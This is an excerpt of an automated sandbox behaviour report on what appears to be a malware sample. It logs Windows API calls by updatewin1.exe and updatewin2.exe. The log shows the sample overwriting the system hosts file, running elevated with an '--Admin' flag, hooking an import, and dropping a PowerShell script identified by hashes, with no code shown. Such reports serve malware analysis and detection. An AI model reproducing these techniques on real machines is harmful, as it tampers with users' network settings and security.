Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Ticks, time = 119527 True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 18233617619 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Create filename = C:\Windows\System32\drivers\etc\hosts, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\System32\drivers\etc\hosts, type = size True 1
Fn
File Write filename = C:\Windows\System32\drivers\etc\hosts, size = 7286 True 1
Fn
Data
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, base_address = 0x400000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-2, base_address = 0x0 False 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #10: updatewin1.exe
Information Value
ID #10
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15
OS Process Information
Information Value
PID 0xa0c
Parent PID 0x9ec (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xa10
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x005A5000 0x005A5FFF Marked Executable - 32-bit - False
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
Hook Information
Type Installer Target Size Information Actions
IAT private_0x0000000000590000:+0x1679d 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000b40000:+0x42f6f6
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 0.05 KB MD5: f972c62f986b5ed49ad7713d93bf6c9f, SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf, SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8, SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl False
Threads
Thread 0xa10
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 119777 True 1
Fn
System Get Time type = Performance Ctr, time = 18199941480 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Ticks, time = 119839 True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
